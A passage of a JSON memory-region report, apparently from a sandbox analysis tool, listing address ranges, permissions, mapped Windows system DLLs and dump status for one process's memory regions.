"00:01:23.677", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 1999044608, "type": "region", "version": 1 }, "end_va": 2000617471, "entry_point": 1999044608, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_1578", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1999044608, "timestamp": "00:01:23.677", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_1579", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:01:23.677", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001580-addr_0x000000007efdb000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_348", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_1580", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:23.678", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001581-addr_0x000000007efde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_349", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_1581", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:01:23.678", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001582-addr_0x000000007efdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_350", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_1582", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:01:23.678", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1583", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:23.678", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001584-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_351", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_1584", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:23.679", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_1585", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:01:23.679", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 1654783, "entry_point": 0, "filename": null, "id": "region_1586", "name": "pagefile_0x0000000000190000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1638400, "timestamp": "00:01:23.684", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001587-addr_0x00000000002f0000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_352", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 3080192, "type": "region", "version": 1 }, "end_va": 3604479, "entry_point": 0, "filename": null, "id": "region_1587", "name": "private_0x00000000002f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3080192, "timestamp": "00:01:23.684", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1953431552, "type": "region", "version": 1 }, "end_va": 1953464319, "entry_point": 1953431552, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_1588", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1953431552, "timestamp": "00:01:23.684", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1953497088, "type": "region", "version": 1 }, "end_va": 1953873919, "entry_point": 1953497088, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_1589", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1953497088, "timestamp": "00:01:23.684", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1953890304, "type": "region", "version": 1 }, "end_va": 1954148351, "entry_point": 1953890304, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_1590", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1953890304, "timestamp": "00:01:23.684", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1591", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:23.700", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1703936, "type": "region", "version": 1 }, "end_va": 2125823, "entry_point": 1703936, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1592", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1703936, "timestamp": "00:01:23.700", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001593-addr_0x0000000000590000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_353", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 5832704, "type": "region", "version": 1 }, "end_va": 6881279, "entry_point": 0, "filename": null, "id": "region_1593", "name": "private_0x0000000000590000", "norm_filename": null, "region_type": "private_memory", "start_va": 5832704, "timestamp": "00:01:23.700", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001594-addr_0x0000000000860000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_354", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8781824, "type": "region", "version": 1 }, "end_va": 8847359, "entry_point": 0, "filename": null, "id": "region_1594", "name": "private_0x0000000000860000", "norm_filename": null, "region_type": "private_memory", "start_va": 8781824, "timestamp": "00:01:23.700", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1388544, "start_va": 1922301952, "type": "region", "version": 1 }, "end_va": 1923690495, "entry_point": 1922301952, "filename": "\\Windows\\SysWOW64\\msvbvm60.dll", "id": "region_1595", "name": "msvbvm60.dll", "norm_filename": "c:\\windows\\syswow64\\msvbvm60.dll", "region_type": "memory_mapped_file", "start_va": 1922301952, "timestamp": "00:01:23.701", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1960574976, "type": "region", "version": 1 }, "end_va": 1960624127, "entry_point": 1960574976, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_1596", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1960574976, "timestamp": "00:01:23.701", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1960640512, "type": "region", "version": 1 }, "end_va": 1961033727, "entry_point": 1960640512, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_1597", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1960640512, "timestamp": "00:01:23.701", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1961426944, "type": "region", "version": 1 }, "end_va": 1961529343, "entry_point": 1961426944, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_1598", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1961426944, "timestamp": "00:01:23.701", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 1964179456, "type": "region", "version": 1 }, "end_va": 1964769279, "entry_point": 1964179456, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_1599", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1964179456, "timestamp": "00:01:23.701", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1965359104, "type": "region", "version": 1 }, "end_va": 1965645823, "entry_point": 1965359104, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_1600", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1965359104, "timestamp": "00:01:23.701", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1965686784, "type": "region", "version": 1 }, "end_va": 1966391295, "entry_point": 1965686784, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_1601", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1965686784, "timestamp": "00:01:23.701", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1967456256, "type": "region", "version": 1 }, "end_va": 1968881663, "entry_point": 1967456256, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_1602", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1967456256, "timestamp": "00:01:23.701", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1968898048, "type": "region", "version": 1 }, "end_va": 1969541119, "entry_point": 1968898048, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_1603", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1968898048, "timestamp": "00:01:23.701", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1970143232, "type": "region", "version": 1 }, "end_va": 1970798591, "entry_point": 1970143232, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_1604", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1970143232, "timestamp": "00:01:23.701", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1970798592, "type": "region", "version": 1 }, "end_va": 1970839551, "entry_point": 1970798592, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_1605", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1970798592, "timestamp": "00:01:23.701", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1970864128, "type": "region", "version": 1 }, "end_va": 1971912703, "entry_point": 1970864128, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_1606", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1970864128, "timestamp": "00:01:23.701", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1973354496, "type": "region", "version": 1 }, "end_va": 1974468607, "entry_point": 1973354496, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_1607", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1973354496, "timestamp": "00:01:23.701", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1991639040, "type": "region", "version": 1 }, "end_va": 1992224767, "entry_point": 1991639040, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_1608", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1991639040, "timestamp": "00:01:23.701", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1993867264, "type": "region", "version": 1 }, "end_va": 1994850303, "entry_point": 1993867264, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_1609", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1993867264, "timestamp": "00:01:23.701", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001610-addr_0x0000000076e70000-size_0x00000000000fa000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_355", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1024000, "start_va": 1994850304, "type": "region", "version": 1 }, "end_va": 1995874303, "entry_point": 0, "filename": null, "id": "region_1610", "name": "private_0x0000000076e70000", "norm_filename": null, "region_type": "private_memory", "start_va": 1994850304, "timestamp": "00:01:23.701", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001611-addr_0x0000000076f70000-size_0x000000000011f000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_356", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1175552, "start_va": 1995898880, "type": "region", "version": 1 }, "end_va": 1997074431, "entry_point": 0, "filename": null, "id": "region_1611", "name": "private_0x0000000076f70000", "norm_filename": null, "region_type": "private_memory", "start_va": 1995898880, "timestamp": "00:01:23.701", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_1612", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:23.702", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1613", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:23.702", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 6881280, "type": "region", "version": 1 }, "end_va": 8486911, "entry_point": 0, "filename": null, "id": "region_1614", "name": "pagefile_0x0000000000690000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6881280, "timestamp": "00:01:23.705", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1961033728, "type": "region", "version": 1 }, "end_va": 1961426943, "entry_point": 1961033728, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_1615", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1961033728, "timestamp": "00:01:23.705", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1974468608, "type": "region", "version": 1 }, "end_va": 1975304191, "entry_point": 1974468608, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_1616", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1974468608, "timestamp": "00:01:23.705", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001617-addr_0x0000000000020000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_357", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1617", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:23.710", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001618-addr_0x0000000000030000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_358", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 200703, "entry_point": 0, "filename": null, "id": "region_1618", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:23.710", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 8847360, "type": "region", "version": 1 }, "end_va": 10424319, "entry_point": 0, "filename": null, "id": "region_1619", "name": "pagefile_0x0000000000870000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8847360, "timestamp": "00:01:23.710", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 10485760, "type": "region", "version": 1 }, "end_va": 31457279, "entry_point": 0, "filename": null, "id": "region_1620", "name": "pagefile_0x0000000000a00000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 10485760, "timestamp": "00:01:23.711", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001621-addr_0x0000000000210000-size_0x00000000000a0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_359", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 655360, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2818047, "entry_point": 0, "filename": null, "id": "region_1621", "name": "private_0x0000000000210000", "norm_filename": null, "region_type": "private_memory", "start_va": 2162688, "timestamp": "00:01:23.711", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001622-addr_0x0000000001e00000-size_0x0000000000400000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_360", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4194304, "start_va": 31457280, "type": "region", "version": 1 }, "end_va": 35651583, "entry_point": 0, "filename": null, "id": "region_1622", "name": "private_0x0000000001e00000", "norm_filename": null, "region_type": "private_memory", "start_va": 31457280, "timestamp": "00:01:23.712", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 35651584, "type": "region", "version": 1 }, "end_va": 38596607, "entry_point": 35651584, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1623", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 35651584, "timestamp": "00:01:23.716", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001624-addr_0x00000000024d0000-size_0x0000000000230000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_361", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 2293760, "start_va": 38600704, "type": "region", "version": 1 }, "end_va": 40894463, "entry_point": 0, "filename": null, "id": "region_1624", "name": "private_0x00000000024d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 38600704, "timestamp": "00:01:23.718", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001625-addr_0x0000000000440000-size_0x0000000000140000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_362", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1310720, "start_va": 4456448, "type": "region", "version": 1 }, "end_va": 5767167, "entry_point": 0, "filename": null, "id": "region_1625", "name": "private_0x0000000000440000", "norm_filename": null, "region_type": "private_memory", "start_va": 4456448, "timestamp": "00:01:23.719", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 524288, "start_va": 1952841728, "type": "region", "version": 1 }, "end_va": 1953366015, "entry_point": 1952841728, "filename": "\\Windows\\SysWOW64\\uxtheme.dll", "id": "region_1626", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\syswow64\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1952841728, "timestamp": "00:01:23.724", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001627-addr_0x00000000024d0000-size_0x0000000000170000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_363", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1507328, "start_va": 38600704, "type": "region", "version": 1 }, "end_va": 40108031, "entry_point": 0, "filename": null, "id": "region_1627", "name": "private_0x00000000024d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 38600704, "timestamp": "00:01:23.725", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001628-addr_0x00000000026c0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_364", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 40632320, "type": "region", "version": 1 }, "end_va": 40894463, "entry_point": 0, "filename": null, "id": "region_1628", "name": "private_0x00000000026c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 40632320, "timestamp": "00:01:23.726", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 4456448, "type": "region", "version": 1 }, "end_va": 5369855, "entry_point": 0, "filename": null, "id": "region_1629", "name": "pagefile_0x0000000000440000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4456448, "timestamp": "00:01:23.728", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001630-addr_0x0000000000540000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_365", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 5505024, "type": "region", "version": 1 }, "end_va": 5767167, "entry_point": 0, "filename": null, "id": "region_1630", "name": "private_0x0000000000540000", "norm_filename": null, "region_type": "private_memory", "start_va": 5505024, "timestamp": "00:01:23.728", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001631-addr_0x0000000000210000-size_0x0000000000050000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_366", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 327680, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2490367, "entry_point": 0, "filename": null, "id": "region_1631", "name": "private_0x0000000000210000", "norm_filename": null, "region_type": "private_memory", "start_va": 2162688, "timestamp": "00:01:23.731", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001632-addr_0x00000000002a0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_367", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2752512, "type": "region", "version": 1 }, "end_va": 2818047, "entry_point": 0, "filename": null, "id": "region_1632", "name": "private_0x00000000002a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2752512, "timestamp": "00:01:23.731", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001633-addr_0x0000000000210000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_368", 